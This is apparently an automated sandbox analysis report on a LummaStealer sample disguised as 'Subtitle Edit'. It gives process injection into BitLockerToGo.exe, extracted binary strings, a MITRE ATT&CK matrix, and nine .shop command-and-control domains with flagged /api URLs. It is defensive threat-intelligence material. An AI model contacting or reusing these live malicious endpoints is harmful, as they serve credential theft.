Source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 0Subtitle Edit.exe
Source: 0Subtitle Edit.exeBinary or memory string: OriginalFileName vs 0Subtitle Edit.exe
Source: 0Subtitle Edit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0Subtitle Edit.exeBinary string: expected '/' for commentinvalid field number: %dmismatching enum lengths\Device\NamedPipe\cygwinunknown compression typecould not resolve %q: %vgoogle.protobuf.DurationMESSAGE_ENCODING_UNKNOWNSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00number of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributegoroutine profile cleanupchansend: spurious wakeupruntime
Source: classification engineClassification label: mal92.evad.winEXE@3/0@3/1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00428637 CoCreateInstance,2_2_00428637
Source: 0Subtitle Edit.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\0Subtitle Edit.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 0Subtitle Edit.exeReversingLabs: Detection: 34%
Source: 0Subtitle Edit.exeString found in binary or memory: [38;5;%dmconsistsofconsistsOfissubsetofisSubsetOfBeforeEachAfterSuiteNode (End) for type but have impossibleUser-AgentConnectionlocal-addrimage/webpimage/jpegaudio/aiffaudio/mpegaudio/midiaudio/wavevideo/webmfont/woff2RST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookieuser-agentkeep-aliveconnectionequivalentHost: %s
Source: 0Subtitle Edit.exeString found in binary or memory: ... omitting .WithDeadline(\.+*?()|[]{}^$X-User-DefinedCLICOLOR_FORCE~/.bash_logout~/.kube/configJustBeforeEach> closed by </RequestTimeoutRequestExpiredContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=Laxaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptable.in-addr.arpa.unknown mode: bad record MACControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWprefix length not an ip:portinvalid Prefixmime/multipartzero parameterformnovalidate$htmltemplate_ /* %s */null missing quotesObjectItem: %s%04d-%02d-%02d%02d:%02d:%02ddocument startsequence startlen of type %sInstEmptyWidth" out of rangeApplyFunction;DifferentialD;DoubleLeftTee;DoubleUpArrow;LeftTeeVector;LeftVectorBar;LessFullEqual;LongLeftArrow;Longleftarrow;NotTildeEqual;NotTildeTilde;Poincareplane;PrecedesEqual;PrecedesTilde;RightArrowBar;RightTeeArrow;RightTriangle;RightUpVector;SucceedsEqual;SucceedsTilde;SupersetEqual;UpEquilibrium;VerticalTilde;VeryThinSpace;bigtriangleup;blacktriangle;divideontimes;fallingdotseq;hookleftarrow;leftarrowtail;leftharpoonup;longleftarrow;looparrowleft;measuredangle;ntriangleleft;shortparallel;smallsetminus;triangleright;upharpoonleft;NotEqualTilde;varsubsetneqq;varsupsetneqq;^[a-zA-Z0-9]+$^[0-9a-f]{32}$^[0-9a-f]{64}$^[0-9a-f]{96}$^[0-9a-f]{40}$^[0-9a-f]{48}$eq_ignore_casene_ignore_caseEC PRIVATE KEYSubConn(id:%d)grpc-go/1.65.0"OUT_OF_RANGE"ALREADY_EXISTSAccept-CharsetDkim-Signatureneed more dataREQUEST_METHODRCodeNameErrorResourceHeaderunknown node: expected 'inf'expected 'nan'reserved_rangefield_presenceimage/x-ms-bmpaudio/musepackaudio/vnd.wavevideo/x-ms-asfvideo/x-ms-wmvimage/vnd.djvuplugin startedunknown ID: %vhealth_service%s Channel #%dgrpc-trace-bintoo_many_pingsAuthInfo: '%s'show_sensitivecloud.adc-e.ukcsp.hci.ic.govap-northeast-1ap-northeast-2ap-northeast-3ap-southeast-1ap-southeast-2ap-southeast-3ap-southeast-4Europe (Milan)Europe (Spain)Europe (Paris)US East (Ohio)fips-ca-west-1fips-us-east-1fips-us-east-2fips-us-west-1fips-us-west-2ca-west-1-fipsus-east-1-fipsus-east-2-fipsus-west-1-fipsus-west-2-fipsamplifybackendapi.ecr-publicbackup-gatewayclouddirectorycloudformationlocalhost:8000edge.sagemakerfips-ap-east-1fips-eu-west-1fips-eu-west-2fips-eu-west-3fips-sa-east-1emr-containersemr-serverlessprod-ca-west-1prod-us-east-1prod-us-east-2prod-us-west-1prod-us-west-2identity-chimeiotthingsgraphapi-ap-south-1data-eu-west-1data-us-east-1data-us-west-2kendra-rankingap-east-1-fipseu-west-1-fipseu-west-2-fipseu-west-3-fipssa-east-1-fipslookoutmetricsmediapackagev2meetings-chimenetworkmanagerroute53domainsruntime-v2-lexsecretsmanagerserverlessreposervicecatalogsimspaceweaverstoragegatewayworkspaces-webcn-northwest-1api-cn-north-1aws-iso-globalus-isob-east-1eu-isoe-west-1^cn\-
Source: 0Subtitle Edit.exeString found in binary or memory: [0m[%04d]%s %-44s GetConsoleScreenBufferInfoFillConsoleOutputAttributeencountered a cycle via %snet/http: request canceledhttp: invalid cookie valueduplicate pseudo-header %qhttp2: Framer %p: wrote %vframe_windowupdate_bad_lenframe_priority_zero_streamduplicate wildcard name %qliterals differ: %q and %qmalformed HTTP status codeHTTP Version Not Supportedcannot marshal DNS messageunexpected type in connecttoo many colons in addressAs4 called on IPv6 addressSRV header name is invalidunclosed criterion bracketcriterion lacks equal signbad certificate hash valueECDSA verification failureGetSecurityDescriptorGroupGetSecurityDescriptorOwnerNotifyServiceStatusChangeWSetSecurityDescriptorGroupSetSecurityDescriptorOwnerCertFindCertificateInStoreFindFirstVolumeMountPointWFindNextChangeNotificationGetProcessWorkingSetSizeExGetSystemWindowsDirectoryWQueryFullProcessImageNameWSetProcessWorkingSetSizeExRtlNtStatusToDosErrorNoTebSetupDiBuildDriverInfoListprefix length out of rangeecdsa: invalid private keyed25519: bad seed length: invalid port %q after hostcryptobyte: internal error_html_template_attrescaper_html_template_htmlescapertemplate escaped correctlyno templates in name spaceinvalid date-time timezoneunknown line break settingfound undefined tag handlewhile parsing a block nodeinvalid character sequencewhile scanning a directiveinvalid value; expected %sexpected integer; found %sexpected complex; found %stoo many slice indexes: %dnon-function %s of type %snon-comparable type %s: %vgob: local interface type hexcolor|rgb|rgba|hsl|hsla^[-+]?[0-9]+(?:\.[0-9]+)?$^(9694[1-4])([ \-]\d{4})?$iso3166_1_alpha_numeric_euBad field name provided %stimeout waiting for acceptccBalancerWrapper: closingparsed dial target is: %#vHealth checking failed: %vid (%v) <= evictCount (%v)malformed chunked encodingsegment prefix is reservedchacha20: wrong nonce sizechacha20: counter overflowunterminated quoted stringunexpected . after term %qinline table is incompleteapplication/x-ms-installerapplication/vnd.ms-outlookapplication/x-unix-archiveapplication/vnd.adobe.xfdfurn:ietf:params:scim:%s:%sduplicate stream initiatedthe connection is drainingtransport closed by clientmalformed grpc-timeout: %vrequest is done processingDrain() is not implementedgrpc-previous-rpc-attemptsGRPC_GO_LOG_SEVERITY_LEVEL2006/01/02 15:04:05.000000appmesh.af-south-1.api.awsappmesh.ap-south-1.api.awsappmesh.eu-north-1.api.awsappmesh.eu-south-1.api.awsappmesh.me-south-1.api.awsbedrock-runtime-ap-south-1ce.us-east-1.amazonaws.comdatazone.ap-east-1.api.awsdatazone.ca-west-1.api.awsdatazone.eu-west-1.api.awsdatazone.eu-west-2.api.awsdatazone.eu-west-3.api.awsdatazone.sa-east-1.api.awsdatazone.us-east-1.api.awsdatazone.us-east-2.api.awsdatazone.us-west-1.api.awsdatazone.us-west-2.api.awseks-auth.ap-east-1.api.awseks-auth.ca-west-1.api.awseks-auth.eu-west-1.api.awseks-auth.eu-west-2.api.awseks-auth.eu-west-3.api.awseks-auth.sa-east-1.api.awseks-auth.us-east-1.api.awseks-auth.us-east-2.api.awseks-auth.us-west-1
Source: 0Subtitle Edit.exeString found in binary or memory: google/protobuf/field_mask.prototimestamp (%v) before 0001-01-01timeseries: bad level argument: could not parse value for %v: %qinvalid escape code %q in stringrelease of handle with refcount 0Image base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %sbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListhttps://login.microsoftonline.us/crypto/aes: output not full blockskip everything and stop the walkGetVolumeNameForVolumeMountPointWslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexwaiting for unsupported file type142108547152020037174224853515625710542735760100185871124267578125encoding: missing byte order markreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesindefinite length found (not DER)struct contains unexported fieldsError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodyapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for unsupported transfer encoding: %qgo package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: invalid client finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmCryptAcquireCertificatePrivateKeySetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWGODEBUG: no value specified for "unaligned 64-bit atomic operationSigEd25519 no Ed25519 collisions
Source: 0Subtitle Edit.exeString found in binary or memory: google/protobuf/field_mask.prototimestamp (%v) before 0001-01-01timeseries: bad level argument: could not parse value for %v: %qinvalid escape code %q in stringrelease of handle with refcount 0Image base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %sbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListhttps://login.microsoftonline.us/crypto/aes: output not full blockskip everything and stop the walkGetVolumeNameForVolumeMountPointWslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexwaiting for unsupported file type142108547152020037174224853515625710542735760100185871124267578125encoding: missing byte order markreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesindefinite length found (not DER)struct contains unexported fieldsError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodyapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for unsupported transfer encoding: %qgo package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: invalid client finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmCryptAcquireCertificatePrivateKeySetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWGODEBUG: no value specified for "unaligned 64-bit atomic operationSigEd25519 no Ed25519 collisions
Source: 0Subtitle Edit.exeString found in binary or memory: net/addrselect.go
Source: 0Subtitle Edit.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: 0Subtitle Edit.exeString found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
Source: 0Subtitle Edit.exeString found in binary or memory: google.golang.org/grpc@v1.65.0/internal/balancerload/load.go
Source: 0Subtitle Edit.exeString found in binary or memory: github.com/hashicorp/go-plugin@v1.6.1/internal/cmdrunner/addr_translator.go
Source: 0Subtitle Edit.exeString found in binary or memory: github.com/hashicorp/yamux@v0.1.1/addr.go
Source: C:\Users\user\Desktop\0Subtitle Edit.exeFile read: C:\Users\user\Desktop\0Subtitle Edit.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\0Subtitle Edit.exe "C:\Users\user\Desktop\0Subtitle Edit.exe"
Source: C:\Users\user\Desktop\0Subtitle Edit.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\0Subtitle Edit.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: 0Subtitle Edit.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: 0Subtitle Edit.exeStatic file information: File size 18028032 > 1048576
Source: 0Subtitle Edit.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x795000
Source: 0Subtitle Edit.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x8aa000
Source: 0Subtitle Edit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp
Source: 0Subtitle Edit.exeStatic PE information: section name: .symtab
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043D928 push cs; retn 0040h2_2_0043D929
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004226DE push ebp; ret 2_2_004226E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043F790 push edx; iretd 2_2_0043F791
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043F7A0 pushad ; iretd 2_2_0043F7A9
Source: C:\Users\user\Desktop\0Subtitle Edit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4036Thread sleep time: -30000s >= -30000sJump to behavior
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002847000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 0Subtitle Edit.exe, 00000000.00000002.2282162764.000000000228D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00435DA0 LdrInitializeThunk,2_2_00435DA0

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: separateedmsqj.shop
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 24F008Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43A000Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43D000Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44D000Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Users\user\Desktop\0Subtitle Edit.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
311
Process Injection
2
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
311
Process Injection
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop Protocol2
Clipboard Data
2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Deobfuscate/Decode Files or Information
Security Account Manager12
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
0Subtitle Edit.exe34%ReversingLabsWin32.Trojan.LummaStealer
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://locatedblsoqp.shop/api100%Avira URL Cloudmalware
https://locatedblsoqp.shop/100%Avira URL Cloudphishing
https://traineiwnqo.shop/api100%Avira URL Cloudmalware
http://earth.google.com/kml/2.20%Avira URL Cloudsafe
http://www.opengis.net/gml0%Avira URL Cloudsafe
http://www.topografix.com/GPX/1/10%Avira URL Cloudsafe
http://www.collada.org/2005/11/COLLADASchema0%Avira URL Cloudsafe
http://earth.google.com/kml/2.00%Avira URL Cloudsafe
https://locatedblsoqp.shop/0z100%Avira URL Cloudphishing
http://earth.google.com/kml/2.10%Avira URL Cloudsafe
http://www.opengis.net/gml/3.3/exr0%Avira URL Cloudsafe
http://www.opengis.net/gml/3.20%Avira URL Cloudsafe
https://traineiwnqo.shop/8100%Avira URL Cloudmalware
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v20%Avira URL Cloudsafe
https://www.cloudflare.com/learning/ddos/glossary/malware/0%Avira URL Cloudsafe
http://www.opengis.net/kml/2.20%Avira URL Cloudsafe
https://separateedmsqj.shop/api100%Avira URL Cloudmalware
https://locatedblsoqp.shop/W100%Avira URL Cloudphishing
https://traineiwnqo.shop/100%Avira URL Cloudmalware
https://login.microsoftonline.us/crypto/aes:0%Avira URL Cloudsafe
https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
https://separateedmsqj.shop/x860%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
separateedmsqj.shop
188.114.96.3
truetrue
    unknown
    locatedblsoqp.shop
    188.114.96.3
    truetrue
      unknown
      traineiwnqo.shop
      188.114.96.3
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://locatedblsoqp.shop/apitrue
        • Avira URL Cloud: malware
        unknown
